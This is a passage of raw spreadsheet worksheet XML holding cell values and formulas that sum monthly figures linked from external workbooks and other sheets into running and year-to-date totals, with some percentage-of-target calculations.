      <c r="C34" s="193" t="s">
        <v>249</v>
      </c>
      <c r="D34" s="206" t="s">
        <v>250</v>
      </c>
      <c r="E34" s="194"/>
      <c r="F34" s="194"/>
      <c r="G34" s="194">
        <f>'[11]11'!$E$50</f>
        <v>0</v>
      </c>
      <c r="H34" s="194">
        <f>G34+'10'!H34</f>
        <v>0</v>
      </c>
      <c r="I34" s="194">
        <f>H34+yc!I34</f>
        <v>0</v>
      </c>
      <c r="J34" s="194">
        <f>'[11]11'!$I$50</f>
        <v>0</v>
      </c>
      <c r="K34" s="194">
        <f>J34+'10'!K34</f>
        <v>666.89</v>
      </c>
      <c r="L34" s="194">
        <f>K34+yc!L34</f>
        <v>467869.82</v>
      </c>
      <c r="M34" s="225">
        <f>'[11]11'!$L$15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'[11]11'!$E$64</f>
        <v>0</v>
      </c>
      <c r="H35" s="194">
        <f>G35+'10'!H35</f>
        <v>0</v>
      </c>
      <c r="I35" s="194">
        <f>H35+yc!I35</f>
        <v>0</v>
      </c>
      <c r="J35" s="194">
        <f>'[11]11'!$I$64</f>
        <v>0</v>
      </c>
      <c r="K35" s="194">
        <f>J35+'10'!K35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G36+'10'!H36</f>
        <v>0</v>
      </c>
      <c r="I36" s="194">
        <f>H36+yc!I36</f>
        <v>0</v>
      </c>
      <c r="J36" s="194">
        <f>J37+J40</f>
        <v>0</v>
      </c>
      <c r="K36" s="194">
        <f>J36+'10'!K36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G37+'10'!H37</f>
        <v>0</v>
      </c>
      <c r="I37" s="194">
        <f>H37+yc!I37</f>
        <v>0</v>
      </c>
      <c r="J37" s="194">
        <f>SUM(J38:J39)</f>
        <v>0</v>
      </c>
      <c r="K37" s="194">
        <f>J37+'10'!K37</f>
        <v>0</v>
      </c>
      <c r="L37" s="194">
        <f>K37+yc!L37</f>
        <v>0</v>
      </c>
      <c r="M37" s="225"/>
      <c r="N37" s="195"/>
      <c r="O37" s="197" t="s">
        <v>268</v>
      </c>
      <c r="P37" s="218" t="s">
        <v>229</v>
      </c>
      <c r="Q37" s="191" t="s">
        <v>277</v>
      </c>
      <c r="R37" s="231">
        <f>'[10]11'!$P$7</f>
        <v>0</v>
      </c>
      <c r="S37" s="232">
        <f>'[10]11'!$Q$7</f>
        <v>0</v>
      </c>
      <c r="T37" s="233">
        <f>'[10]11'!$R$7</f>
        <v>0</v>
      </c>
      <c r="U37" s="234">
        <f>T37+'10'!U37</f>
        <v>0</v>
      </c>
      <c r="V37" s="234">
        <f>U37+yc!V37</f>
        <v>0</v>
      </c>
      <c r="W37" s="235">
        <f>'[10]11'!$V$7</f>
        <v>0</v>
      </c>
      <c r="X37" s="234">
        <f>W37+'10'!X37</f>
        <v>0</v>
      </c>
      <c r="Y37" s="235">
        <f>X37+yc!Y37</f>
        <v>0</v>
      </c>
      <c r="Z37" s="235">
        <f>'[10]11'!$Y$7</f>
        <v>0</v>
      </c>
    </row>
    <row r="38" ht="15.75" customHeight="1" spans="1:26">
      <c r="A38" s="191"/>
      <c r="B38" s="191" t="s">
        <v>231</v>
      </c>
      <c r="C38" s="193" t="s">
        <v>257</v>
      </c>
      <c r="D38" s="193"/>
      <c r="E38" s="194"/>
      <c r="F38" s="194"/>
      <c r="G38" s="225"/>
      <c r="H38" s="194">
        <f>G38+'10'!H38</f>
        <v>0</v>
      </c>
      <c r="I38" s="194">
        <f>H38+yc!I38</f>
        <v>0</v>
      </c>
      <c r="J38" s="194"/>
      <c r="K38" s="194">
        <f>J38+'10'!K38</f>
        <v>0</v>
      </c>
      <c r="L38" s="194">
        <f>K38+yc!L38</f>
        <v>0</v>
      </c>
      <c r="M38" s="194"/>
      <c r="N38" s="195"/>
      <c r="O38" s="200"/>
      <c r="P38" s="236"/>
      <c r="Q38" s="193" t="s">
        <v>278</v>
      </c>
      <c r="R38" s="237">
        <f>'[10]11'!$P$10</f>
        <v>0</v>
      </c>
      <c r="S38" s="235">
        <f>'[10]11'!$Q$10</f>
        <v>9645.331</v>
      </c>
      <c r="T38" s="235">
        <f>'[10]11'!$R$10</f>
        <v>0</v>
      </c>
      <c r="U38" s="234">
        <f>T38+'10'!U38</f>
        <v>5520.34</v>
      </c>
      <c r="V38" s="234">
        <f>U38+yc!V38</f>
        <v>264660.06</v>
      </c>
      <c r="W38" s="235">
        <f>'[10]11'!$V$10</f>
        <v>0</v>
      </c>
      <c r="X38" s="234">
        <f>W38+'10'!X38</f>
        <v>7808</v>
      </c>
      <c r="Y38" s="235">
        <f>X38+yc!Y38</f>
        <v>263915</v>
      </c>
      <c r="Z38" s="235">
        <f>'[10]11'!$Y$10</f>
        <v>7357.671</v>
      </c>
    </row>
    <row r="39" ht="15.75" customHeight="1" spans="1:26">
      <c r="A39" s="191"/>
      <c r="B39" s="191"/>
      <c r="C39" s="193" t="s">
        <v>259</v>
      </c>
      <c r="D39" s="193"/>
      <c r="E39" s="194"/>
      <c r="F39" s="194"/>
      <c r="G39" s="194"/>
      <c r="H39" s="194">
        <f>G39+'10'!H39</f>
        <v>0</v>
      </c>
      <c r="I39" s="194">
        <f>H39+yc!I39</f>
        <v>0</v>
      </c>
      <c r="J39" s="194"/>
      <c r="K39" s="194">
        <f>J39+'10'!K39</f>
        <v>0</v>
      </c>
      <c r="L39" s="194">
        <f>K39+yc!L39</f>
        <v>0</v>
      </c>
      <c r="M39" s="194"/>
      <c r="N39" s="195"/>
      <c r="O39" s="200"/>
      <c r="P39" s="236"/>
      <c r="Q39" s="191" t="s">
        <v>279</v>
      </c>
      <c r="R39" s="231">
        <f>'[10]11'!$P$50</f>
        <v>0</v>
      </c>
      <c r="S39" s="232">
        <f>'[10]11'!$Q$50</f>
        <v>1231.546</v>
      </c>
      <c r="T39" s="238">
        <f>'[10]11'!$R$50</f>
        <v>181.72</v>
      </c>
      <c r="U39" s="234">
        <f>T39+'10'!U39</f>
        <v>3433.18</v>
      </c>
      <c r="V39" s="234">
        <f>U39+yc!V39</f>
        <v>82246.779</v>
      </c>
      <c r="W39" s="235">
        <f>'[10]11'!$V$50</f>
        <v>233</v>
      </c>
      <c r="X39" s="234">
        <f>W39+'10'!X39</f>
        <v>3220</v>
      </c>
      <c r="Y39" s="235">
        <f>X39+yc!Y39</f>
        <v>81979</v>
      </c>
      <c r="Z39" s="238">
        <f>'[10]11'!$Y$50</f>
        <v>1444.726</v>
      </c>
    </row>
    <row r="40" ht="15.75" customHeight="1" spans="1:26">
      <c r="A40" s="191"/>
      <c r="B40" s="193" t="s">
        <v>261</v>
      </c>
      <c r="C40" s="193"/>
      <c r="D40" s="193"/>
      <c r="E40" s="194"/>
      <c r="F40" s="194"/>
      <c r="G40" s="225"/>
      <c r="H40" s="194">
        <f>G40+'10'!H40</f>
        <v>0</v>
      </c>
      <c r="I40" s="194">
        <f>H40+yc!I40</f>
        <v>0</v>
      </c>
      <c r="J40" s="194"/>
      <c r="K40" s="194">
        <f>J40+'10'!K40</f>
        <v>0</v>
      </c>
      <c r="L40" s="194">
        <f>K40+yc!L40</f>
        <v>0</v>
      </c>
      <c r="M40" s="194"/>
      <c r="N40" s="195"/>
      <c r="O40" s="200"/>
      <c r="P40" s="219"/>
      <c r="Q40" s="191" t="s">
        <v>280</v>
      </c>
      <c r="R40" s="239">
        <f>'[10]11'!$P$44</f>
        <v>0</v>
      </c>
      <c r="S40" s="240">
        <f>'[10]11'!$Q$44</f>
        <v>0</v>
      </c>
      <c r="T40" s="238">
        <f>'[10]11'!$R$44</f>
        <v>0</v>
      </c>
      <c r="U40" s="234">
        <f>'[10]11'!$S$44</f>
        <v>0</v>
      </c>
      <c r="V40" s="234">
        <f>'[10]11'!$T$44</f>
        <v>0</v>
      </c>
      <c r="W40" s="235">
        <f>'[10]11'!$V$44</f>
        <v>0</v>
      </c>
      <c r="X40" s="234">
        <f>'[10]11'!$W$44</f>
        <v>0</v>
      </c>
      <c r="Y40" s="235">
        <f>'[10]11'!$X$44</f>
        <v>0</v>
      </c>
      <c r="Z40" s="238">
        <f>'[10]11'!$Y$44</f>
        <v>0</v>
      </c>
    </row>
    <row r="41" ht="15.75" customHeight="1" spans="1:26">
      <c r="A41" s="191" t="s">
        <v>252</v>
      </c>
      <c r="B41" s="193" t="s">
        <v>227</v>
      </c>
      <c r="C41" s="193"/>
      <c r="D41" s="193"/>
      <c r="E41" s="194">
        <v>12000</v>
      </c>
      <c r="F41" s="194">
        <f>'[12]11'!$D$16</f>
        <v>26129.76</v>
      </c>
      <c r="G41" s="225">
        <f>'[12]11'!$E$16</f>
        <v>2178</v>
      </c>
      <c r="H41" s="194">
        <f>G41+'10'!H41</f>
        <v>4334</v>
      </c>
      <c r="I41" s="194">
        <f>H41+yc!I41</f>
        <v>129310</v>
      </c>
      <c r="J41" s="194">
        <f>'[12]11'!$I$16</f>
        <v>1236.46</v>
      </c>
      <c r="K41" s="194">
        <f>J41+'10'!K41</f>
        <v>6499.24</v>
      </c>
      <c r="L41" s="194">
        <f>K41+yc!L41</f>
        <v>127892.78</v>
      </c>
      <c r="M41" s="194">
        <f>'[12]11'!$L$16</f>
        <v>23964.52</v>
      </c>
      <c r="N41" s="195">
        <f>M41/30000*100</f>
        <v>79.8817333333333</v>
      </c>
      <c r="O41" s="200"/>
      <c r="P41" s="213" t="s">
        <v>237</v>
      </c>
      <c r="Q41" s="191" t="s">
        <v>277</v>
      </c>
      <c r="R41" s="239">
        <f>'[11]11'!$P$7</f>
        <v>0</v>
      </c>
      <c r="S41" s="240">
        <f>'[11]11'!$Q$7</f>
        <v>0.621</v>
      </c>
      <c r="T41" s="238">
        <f>'[11]11'!$R$7</f>
        <v>0</v>
      </c>
      <c r="U41" s="234">
        <f>T41+'10'!U41</f>
        <v>0</v>
      </c>
      <c r="V41" s="234">
        <f>U41+yc!V41</f>
        <v>0.621000000000095</v>
      </c>
      <c r="W41" s="235">
        <f>'[11]11'!$V$7</f>
        <v>0</v>
      </c>
      <c r="X41" s="234">
        <f>W41+'10'!X41</f>
        <v>0</v>
      </c>
      <c r="Y41" s="235">
        <f>X41+yc!Y41</f>
        <v>9.45910016980633e-14</v>
      </c>
      <c r="Z41" s="238">
        <f>'[11]11'!$Y$7</f>
        <v>0.621</v>
      </c>
    </row>
    <row r="42" ht="15.75" customHeight="1" spans="1:26">
      <c r="A42" s="191"/>
      <c r="B42" s="191" t="s">
        <v>244</v>
      </c>
      <c r="C42" s="193" t="s">
        <v>245</v>
      </c>
      <c r="D42" s="193" t="s">
        <v>246</v>
      </c>
      <c r="E42" s="194">
        <v>0</v>
      </c>
      <c r="F42" s="194">
        <f>'[12]11'!$D$13</f>
        <v>0</v>
      </c>
      <c r="G42" s="225">
        <f>'[12]11'!$E$13</f>
        <v>0</v>
      </c>
      <c r="H42" s="194">
        <f>G42+'10'!H42</f>
        <v>0</v>
      </c>
      <c r="I42" s="194">
        <f>H42+yc!I42</f>
        <v>0</v>
      </c>
      <c r="J42" s="194">
        <f>'[12]11'!$I$13</f>
        <v>0</v>
      </c>
      <c r="K42" s="194">
        <f>J42+'10'!K42</f>
        <v>0</v>
      </c>
      <c r="L42" s="194">
        <f>K42+yc!L42</f>
        <v>0</v>
      </c>
      <c r="M42" s="194">
        <f>'[12]11'!$L$13</f>
        <v>0</v>
      </c>
      <c r="N42" s="207">
        <f>(M42+M43)/50000*100</f>
        <v>0</v>
      </c>
      <c r="O42" s="200"/>
      <c r="P42" s="215"/>
      <c r="Q42" s="193" t="s">
        <v>278</v>
      </c>
      <c r="R42" s="237">
        <f>'[11]11'!$P$8</f>
        <v>14000</v>
      </c>
      <c r="S42" s="238">
        <f>'[11]11'!$Q$8</f>
        <v>8478.836</v>
      </c>
      <c r="T42" s="238">
        <f>'[11]11'!$R$8</f>
        <v>1659.1</v>
      </c>
      <c r="U42" s="234">
        <f>T42+'10'!U42</f>
        <v>4878.88</v>
      </c>
      <c r="V42" s="235">
        <f>U42+yc!V42</f>
        <v>212465.85</v>
      </c>
      <c r="W42" s="235">
        <f>'[11]11'!$V$8</f>
        <v>831</v>
      </c>
      <c r="X42" s="234">
        <f>W42+'10'!X42</f>
        <v>6206</v>
      </c>
      <c r="Y42" s="235">
        <f>X42+yc!Y42</f>
        <v>208677</v>
      </c>
      <c r="Z42" s="238">
        <f>'[11]11'!$Y$8</f>
        <v>7151.716</v>
      </c>
    </row>
    <row r="43" ht="15.75" customHeight="1" spans="1:26">
      <c r="A43" s="191"/>
      <c r="B43" s="193"/>
      <c r="C43" s="193"/>
      <c r="D43" s="206" t="s">
        <v>248</v>
      </c>
      <c r="E43" s="194"/>
      <c r="F43" s="194">
        <f>'[12]11'!$D$14</f>
        <v>0</v>
      </c>
      <c r="G43" s="225">
        <f>'[12]11'!$E$14</f>
        <v>0</v>
      </c>
      <c r="H43" s="194">
        <f>G43+'10'!H43</f>
        <v>0</v>
      </c>
      <c r="I43" s="194">
        <f>H43+yc!I43</f>
        <v>0</v>
      </c>
      <c r="J43" s="194">
        <f>'[12]11'!$I$14</f>
        <v>0</v>
      </c>
      <c r="K43" s="194">
        <f>J43+'10'!K43</f>
        <v>0</v>
      </c>
      <c r="L43" s="194">
        <f>K43+yc!L43</f>
        <v>0</v>
      </c>
      <c r="M43" s="194">
        <f>'[12]11'!$L$14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'[12]11'!$E$44</f>
        <v>0</v>
      </c>
      <c r="H44" s="194">
        <f>G44+'10'!H44</f>
        <v>0</v>
      </c>
      <c r="I44" s="194">
        <f>H44+yc!I44</f>
        <v>128550.22</v>
      </c>
      <c r="J44" s="194">
        <f>'[12]11'!$I$44</f>
        <v>0</v>
      </c>
      <c r="K44" s="194">
        <f>J44+'10'!K44</f>
        <v>0</v>
      </c>
      <c r="L44" s="194">
        <f>K44+yc!L44</f>
        <v>0</v>
      </c>
      <c r="M44" s="194">
        <f>'[12]11'!$L$15</f>
        <v>64232.78</v>
      </c>
      <c r="N44" s="195"/>
      <c r="O44" s="200"/>
      <c r="P44" s="215"/>
      <c r="Q44" s="191" t="s">
        <v>279</v>
      </c>
      <c r="R44" s="237">
        <f>'[11]11'!$P$29</f>
        <v>8000</v>
      </c>
      <c r="S44" s="238">
        <f>'[11]11'!$Q$29</f>
        <v>2299.457</v>
      </c>
      <c r="T44" s="238">
        <f>'[11]11'!$R$29</f>
        <v>0</v>
      </c>
      <c r="U44" s="234">
        <f>T44+'10'!U44</f>
        <v>2689</v>
      </c>
      <c r="V44" s="235">
        <f>U44+yc!V44</f>
        <v>67442.168</v>
      </c>
      <c r="W44" s="235">
        <f>'[11]11'!$V$29</f>
        <v>301</v>
      </c>
      <c r="X44" s="234">
        <f>W44+'10'!X44</f>
        <v>2024</v>
      </c>
      <c r="Y44" s="235">
        <f>X44+yc!Y44</f>
        <v>68434</v>
      </c>
      <c r="Z44" s="238">
        <f>'[11]11'!$Y$29</f>
        <v>2964.457</v>
      </c>
    </row>
    <row r="45" ht="15.75" customHeight="1" spans="1:26">
      <c r="A45" s="191"/>
      <c r="B45" s="193"/>
      <c r="C45" s="193"/>
      <c r="D45" s="193" t="s">
        <v>251</v>
      </c>
      <c r="E45" s="194"/>
      <c r="F45" s="194"/>
      <c r="G45" s="225">
        <f>'[12]11'!$E$55</f>
        <v>0</v>
      </c>
      <c r="H45" s="194">
        <f>G45+'10'!H45</f>
        <v>0</v>
      </c>
      <c r="I45" s="194">
        <f>H45+yc!I45</f>
        <v>0</v>
      </c>
      <c r="J45" s="225">
        <f>'[12]11'!$I$55</f>
        <v>0</v>
      </c>
      <c r="K45" s="194">
        <f>J45+'10'!K45</f>
        <v>0</v>
      </c>
      <c r="L45" s="194">
        <f>K45+yc!L45</f>
        <v>0</v>
      </c>
      <c r="M45" s="194"/>
      <c r="N45" s="195"/>
      <c r="O45" s="200"/>
      <c r="P45" s="214"/>
      <c r="Q45" s="191" t="s">
        <v>280</v>
      </c>
      <c r="R45" s="237">
        <f>'[11]11'!$P$23</f>
        <v>0</v>
      </c>
      <c r="S45" s="238">
        <f>'[11]11'!$Q$23</f>
        <v>0</v>
      </c>
      <c r="T45" s="238">
        <f>'[11]11'!$R$23</f>
        <v>0</v>
      </c>
      <c r="U45" s="234">
        <f>'[11]11'!$S$23</f>
        <v>0</v>
      </c>
      <c r="V45" s="235">
        <f>'[11]11'!$T$23</f>
        <v>1.329</v>
      </c>
      <c r="W45" s="235">
        <f>'[11]11'!$V$23</f>
        <v>0</v>
      </c>
      <c r="X45" s="234">
        <f>'[11]11'!$W$23</f>
        <v>0</v>
      </c>
      <c r="Y45" s="235">
        <f>'[11]11'!$X$23</f>
        <v>1.329</v>
      </c>
      <c r="Z45" s="238">
        <f>'[11]11'!$Y$23</f>
        <v>0</v>
      </c>
    </row>
    <row r="46" ht="15.75" customHeight="1" spans="1:26">
      <c r="A46" s="191"/>
      <c r="B46" s="193" t="s">
        <v>253</v>
      </c>
      <c r="C46" s="193"/>
      <c r="D46" s="193"/>
      <c r="E46" s="194"/>
      <c r="F46" s="194"/>
      <c r="G46" s="194"/>
      <c r="H46" s="194">
        <f>G46+'10'!H46</f>
        <v>0</v>
      </c>
      <c r="I46" s="194">
        <f>H46+yc!I46</f>
        <v>0</v>
      </c>
      <c r="J46" s="194">
        <f>J47+J50</f>
        <v>0</v>
      </c>
      <c r="K46" s="194">
        <f>J46+'10'!K46</f>
        <v>0</v>
      </c>
      <c r="L46" s="194">
        <f>K46+yc!L46</f>
        <v>0</v>
      </c>
      <c r="M46" s="194"/>
      <c r="N46" s="195"/>
      <c r="O46" s="200"/>
      <c r="P46" s="242" t="s">
        <v>252</v>
      </c>
      <c r="Q46" s="193" t="s">
        <v>277</v>
      </c>
      <c r="R46" s="237">
        <f>'[12]11'!$P$7</f>
        <v>0</v>
      </c>
      <c r="S46" s="238">
        <f>'[12]11'!$Q$7</f>
        <v>0</v>
      </c>
      <c r="T46" s="238">
        <f>'[12]11'!$R$7</f>
        <v>0</v>
      </c>
      <c r="U46" s="234">
        <f>T46+'10'!U46</f>
        <v>0</v>
      </c>
      <c r="V46" s="234">
        <f>U46+yc!V46</f>
        <v>0</v>
      </c>
      <c r="W46" s="235">
        <f>'[12]11'!$V$7</f>
        <v>0</v>
      </c>
      <c r="X46" s="234">
        <f>W46+'10'!X46</f>
        <v>0</v>
      </c>
      <c r="Y46" s="235">
        <f>X46+yc!Y46</f>
        <v>0</v>
      </c>
      <c r="Z46" s="238">
        <f>'[12]11'!$Y$7</f>
        <v>0</v>
      </c>
    </row>
    <row r="47" ht="15.75" customHeight="1" spans="1:26">
      <c r="A47" s="191"/>
      <c r="B47" s="193" t="s">
        <v>254</v>
      </c>
      <c r="C47" s="193"/>
      <c r="D47" s="193"/>
      <c r="E47" s="194">
        <v>12000</v>
      </c>
      <c r="F47" s="194"/>
      <c r="G47" s="225"/>
      <c r="H47" s="194">
        <f>G47+'10'!H47</f>
        <v>0</v>
      </c>
      <c r="I47" s="194">
        <f>H47+yc!I47</f>
        <v>0</v>
      </c>
      <c r="J47" s="194">
        <f>SUM(J48:J49)</f>
        <v>0</v>
      </c>
      <c r="K47" s="194">
        <f>J47+'10'!K47</f>
        <v>0</v>
      </c>
      <c r="L47" s="194">
        <f>K47+yc!L47</f>
        <v>0</v>
      </c>
      <c r="M47" s="194"/>
      <c r="N47" s="195"/>
      <c r="O47" s="200"/>
      <c r="P47" s="243"/>
      <c r="Q47" s="193" t="s">
        <v>278</v>
      </c>
      <c r="R47" s="237">
        <f>'[12]11'!$P$8</f>
        <v>0</v>
      </c>
      <c r="S47" s="238">
        <f>'[12]11'!$Q$8</f>
        <v>0</v>
      </c>
      <c r="T47" s="238">
        <f>'[12]11'!$R$8</f>
        <v>0</v>
      </c>
      <c r="U47" s="234">
        <f>T47+'10'!U47</f>
        <v>0</v>
      </c>
      <c r="V47" s="234">
        <f>U47+yc!V47</f>
        <v>0</v>
      </c>
      <c r="W47" s="235">
        <f>'[12]11'!$V$8</f>
        <v>0</v>
      </c>
      <c r="X47" s="234">
        <f>W47+'10'!X47</f>
        <v>0</v>
      </c>
      <c r="Y47" s="235">
        <f>X47+yc!Y47</f>
        <v>0</v>
      </c>
      <c r="Z47" s="238">
        <f>'[12]11'!$Y$8</f>
        <v>0</v>
      </c>
    </row>
    <row r="48" ht="15.75" customHeight="1" spans="1:26">
      <c r="A48" s="191"/>
      <c r="B48" s="191" t="s">
        <v>231</v>
      </c>
      <c r="C48" s="193" t="s">
        <v>257</v>
      </c>
      <c r="D48" s="193"/>
      <c r="E48" s="194"/>
      <c r="F48" s="194"/>
      <c r="G48" s="225"/>
      <c r="H48" s="194">
        <f>G48+'10'!H48</f>
        <v>0</v>
      </c>
      <c r="I48" s="194">
        <f>H48+yc!I48</f>
        <v>0</v>
      </c>
      <c r="J48" s="194"/>
      <c r="K48" s="194">
        <f>J48+'10'!K48</f>
        <v>0</v>
      </c>
      <c r="L48" s="194">
        <f>K48+yc!L48</f>
        <v>0</v>
      </c>
      <c r="M48" s="194"/>
      <c r="N48" s="195"/>
      <c r="O48" s="200"/>
      <c r="P48" s="243"/>
      <c r="Q48" s="193" t="s">
        <v>279</v>
      </c>
      <c r="R48" s="237">
        <f>'[12]11'!$P$34</f>
        <v>0</v>
      </c>
      <c r="S48" s="238">
        <f>'[12]11'!$Q$34</f>
        <v>1585.503</v>
      </c>
      <c r="T48" s="238">
        <f>'[12]11'!$R$34</f>
        <v>0</v>
      </c>
      <c r="U48" s="234">
        <f>T48+'10'!U48</f>
        <v>300.06</v>
      </c>
      <c r="V48" s="234">
        <f>U48+yc!V48</f>
        <v>6326.59</v>
      </c>
      <c r="W48" s="235">
        <f>'[12]11'!$V$8</f>
        <v>0</v>
      </c>
      <c r="X48" s="234">
        <f>W48+'10'!X48</f>
        <v>0</v>
      </c>
      <c r="Y48" s="235">
        <f>X48+yc!Y48</f>
        <v>0</v>
      </c>
      <c r="Z48" s="238">
        <f>'[12]11'!$Y$8</f>
        <v>0</v>
      </c>
    </row>
    <row r="49" ht="15.75" customHeight="1" spans="1:26">
      <c r="A49" s="191"/>
      <c r="B49" s="191"/>
      <c r="C49" s="193" t="s">
        <v>259</v>
      </c>
      <c r="D49" s="193"/>
      <c r="E49" s="194"/>
      <c r="F49" s="194"/>
      <c r="G49" s="194"/>
      <c r="H49" s="194">
        <f>G49+'10'!H49</f>
        <v>0</v>
      </c>
      <c r="I49" s="194">
        <f>H49+yc!I49</f>
        <v>0</v>
      </c>
      <c r="J49" s="194"/>
      <c r="K49" s="194">
        <f>J49+'10'!K49</f>
        <v>0</v>
      </c>
      <c r="L49" s="194">
        <f>K49+yc!L49</f>
        <v>0</v>
      </c>
      <c r="M49" s="194"/>
      <c r="N49" s="195"/>
      <c r="O49" s="200"/>
      <c r="P49" s="197" t="s">
        <v>304</v>
      </c>
      <c r="Q49" s="193" t="s">
        <v>278</v>
      </c>
      <c r="R49" s="237">
        <f>'[13]11'!$P$8</f>
        <v>15340</v>
      </c>
      <c r="S49" s="238">
        <f>'[13]11'!$Q$8</f>
        <v>10593.625</v>
      </c>
      <c r="T49" s="238">
        <f>'[13]11'!$R$8</f>
        <v>0</v>
      </c>
      <c r="U49" s="234">
        <f>T49+'10'!U49</f>
        <v>0</v>
      </c>
      <c r="V49" s="234">
        <f>U49+yc!V49</f>
        <v>179888.95</v>
      </c>
      <c r="W49" s="235">
        <f>'[13]11'!$V$8</f>
        <v>0</v>
      </c>
      <c r="X49" s="234">
        <f>W49+'10'!X49</f>
        <v>0</v>
      </c>
      <c r="Y49" s="235">
        <f>X49+yc!Y49</f>
        <v>176530.34</v>
      </c>
      <c r="Z49" s="238">
        <f>'[13]11'!$Y$8</f>
        <v>10593.625</v>
      </c>
    </row>
    <row r="50" ht="15.75" customHeight="1" spans="1:26">
      <c r="A50" s="191"/>
      <c r="B50" s="193" t="s">
        <v>261</v>
      </c>
      <c r="C50" s="193"/>
      <c r="D50" s="193"/>
      <c r="E50" s="194"/>
      <c r="F50" s="194"/>
      <c r="G50" s="225"/>
      <c r="H50" s="194">
        <f>G50+'10'!H50</f>
        <v>0</v>
      </c>
      <c r="I50" s="194">
        <f>H50+yc!I50</f>
        <v>0</v>
      </c>
      <c r="J50" s="194"/>
      <c r="K50" s="194">
        <f>J50+'10'!K50</f>
        <v>0</v>
      </c>
      <c r="L50" s="194">
        <f>K50+yc!L50</f>
        <v>0</v>
      </c>
      <c r="M50" s="194"/>
      <c r="N50" s="195"/>
      <c r="O50" s="200"/>
      <c r="P50" s="200"/>
      <c r="Q50" s="193" t="s">
        <v>277</v>
      </c>
      <c r="R50" s="237">
        <f>'[13]11'!$P$7</f>
        <v>200</v>
      </c>
      <c r="S50" s="238">
        <f>'[13]11'!$Q$7</f>
        <v>0</v>
      </c>
      <c r="T50" s="238">
        <f>'[13]11'!$R$7</f>
        <v>0</v>
      </c>
      <c r="U50" s="234">
        <f>T50+'10'!U50</f>
        <v>0</v>
      </c>
      <c r="V50" s="234">
        <f>U50+yc!V50</f>
        <v>0</v>
      </c>
      <c r="W50" s="235">
        <f>'[13]11'!$V$7</f>
        <v>0</v>
      </c>
      <c r="X50" s="234">
        <f>W50+'10'!X50</f>
        <v>0</v>
      </c>
      <c r="Y50" s="235">
        <f>X50+yc!Y50</f>
        <v>0</v>
      </c>
      <c r="Z50" s="238">
        <f>'[13]11'!$Y$7</f>
        <v>0</v>
      </c>
    </row>
    <row r="51" ht="15.75" customHeight="1" spans="1:26">
      <c r="A51" s="191" t="s">
        <v>304</v>
      </c>
      <c r="B51" s="193" t="s">
        <v>227</v>
      </c>
      <c r="C51" s="193"/>
      <c r="D51" s="193"/>
      <c r="E51" s="194">
        <v>160000</v>
      </c>
      <c r="F51" s="194">
        <f>'[13]11'!$D$24</f>
        <v>48852.6839999998</v>
      </c>
      <c r="G51" s="225">
        <f>'[13]11'!$E$24</f>
        <v>4484</v>
      </c>
      <c r="H51" s="194">
        <f>G51+'10'!H51</f>
        <v>56409.81</v>
      </c>
      <c r="I51" s="194">
        <f>H51+yc!I51</f>
        <v>1432808.81</v>
      </c>
      <c r="J51" s="194">
        <f>'[13]11'!$I$24</f>
        <v>4658.25</v>
      </c>
      <c r="K51" s="194">
        <f>J51+'10'!K51</f>
        <v>55515.089</v>
      </c>
      <c r="L51" s="194">
        <f>K51+yc!L51</f>
        <v>1418639.02</v>
      </c>
      <c r="M51" s="194">
        <f>'[13]11'!$L$24</f>
        <v>49593.5949999998</v>
      </c>
      <c r="N51" s="195">
        <f>M51/45000*100</f>
        <v>110.207988888888</v>
      </c>
      <c r="O51" s="200"/>
      <c r="P51" s="200"/>
      <c r="Q51" s="193" t="s">
        <v>279</v>
      </c>
      <c r="R51" s="237">
        <f>'[13]11'!$P$30</f>
        <v>8550</v>
      </c>
      <c r="S51" s="238">
        <f>'[13]11'!$Q$30</f>
        <v>3251.37400000001</v>
      </c>
      <c r="T51" s="238">
        <f>'[13]11'!$R$30</f>
        <v>149.38</v>
      </c>
      <c r="U51" s="234">
        <f>T51+'10'!U51</f>
        <v>2557.3</v>
      </c>
      <c r="V51" s="234">
        <f>U51+yc!V51</f>
        <v>65555.771</v>
      </c>
      <c r="W51" s="235">
        <f>'[13]11'!$V$30</f>
        <v>185.2</v>
      </c>
      <c r="X51" s="234">
        <f>W51+'10'!X51</f>
        <v>2375.838</v>
      </c>
      <c r="Y51" s="235">
        <f>X51+yc!Y51</f>
        <v>62992.075</v>
      </c>
      <c r="Z51" s="238">
        <f>'[13]11'!$Y$30</f>
        <v>3432.83600000001</v>
      </c>
    </row>
    <row r="52" ht="15.75" customHeight="1" spans="1:26">
      <c r="A52" s="191"/>
      <c r="B52" s="191" t="s">
        <v>244</v>
      </c>
      <c r="C52" s="193" t="s">
        <v>245</v>
      </c>
      <c r="D52" s="193" t="s">
        <v>246</v>
      </c>
      <c r="E52" s="194">
        <v>175000</v>
      </c>
      <c r="F52" s="194">
        <f>'[13]11'!$D$19</f>
        <v>105046.44300005</v>
      </c>
      <c r="G52" s="225">
        <f>'[13]11'!$E$19</f>
        <v>2e-11</v>
      </c>
      <c r="H52" s="194">
        <f>G52+'10'!H52</f>
        <v>2.2e-10</v>
      </c>
      <c r="I52" s="194">
        <f>H52+yc!I52</f>
        <v>1383567.25</v>
      </c>
      <c r="J52" s="194">
        <f>'[13]11'!$I$19</f>
        <v>3295.2</v>
      </c>
      <c r="K52" s="194">
        <f>J52+'10'!K52</f>
        <v>54725.621</v>
      </c>
      <c r="L52" s="194">
        <f>K52+yc!L52</f>
        <v>1336419.821</v>
      </c>
      <c r="M52" s="194">
        <f>'[13]11'!$L$19</f>
        <v>50320.8220000504</v>
      </c>
      <c r="N52" s="207">
        <f>(M52+M53)/(65000+80000)*100</f>
        <v>34.7040151724486</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'[13]11'!$D$22</f>
        <v>0</v>
      </c>
      <c r="G53" s="225">
        <f>'[13]11'!$E$22</f>
        <v>0</v>
      </c>
      <c r="H53" s="194">
        <f>G53+'10'!H53</f>
        <v>0</v>
      </c>
      <c r="I53" s="194">
        <f>H53+yc!I53</f>
        <v>0</v>
      </c>
      <c r="J53" s="194">
        <f>'[13]11'!$I$22</f>
        <v>0</v>
      </c>
      <c r="K53" s="194">
        <f>J53+'10'!K53</f>
        <v>0</v>
      </c>
      <c r="L53" s="194">
        <f>K53+yc!L53</f>
        <v>0</v>
      </c>
      <c r="M53" s="194">
        <f>'[13]11'!$L$23</f>
        <v>0</v>
      </c>
      <c r="N53" s="212"/>
      <c r="O53" s="200"/>
      <c r="P53" s="223" t="s">
        <v>262</v>
      </c>
      <c r="Q53" s="193" t="s">
        <v>279</v>
      </c>
      <c r="R53" s="245"/>
      <c r="S53" s="237">
        <f>'[14]11'!$M$21+'[14]11'!$M$22+'[14]11'!$M$35</f>
        <v>1648.947</v>
      </c>
      <c r="T53" s="237">
